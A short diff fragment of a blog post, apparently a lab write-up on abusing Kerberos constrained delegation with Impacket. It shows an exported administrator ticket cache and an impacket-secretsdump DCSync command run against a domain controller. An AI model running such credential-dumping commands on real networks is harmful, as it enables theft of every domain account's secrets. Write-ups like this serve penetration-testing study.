0xZon/0xZon.github.io/_posts/2023-05-07-Constrained-Delegation-With-Impacket.md.md

 └─# export KRB5CCNAME=administrator.ccache
 ```

-The DCSync was performed.
+The DCSync was performed using the ticket.
 Impacket connected to the domain controller via smb to perform the DCSync.
 ```
 ┌──(root㉿kali)-[~/impacket/examples]
 └─# impacket-secretsdump -k dc.lotr.local -just-dc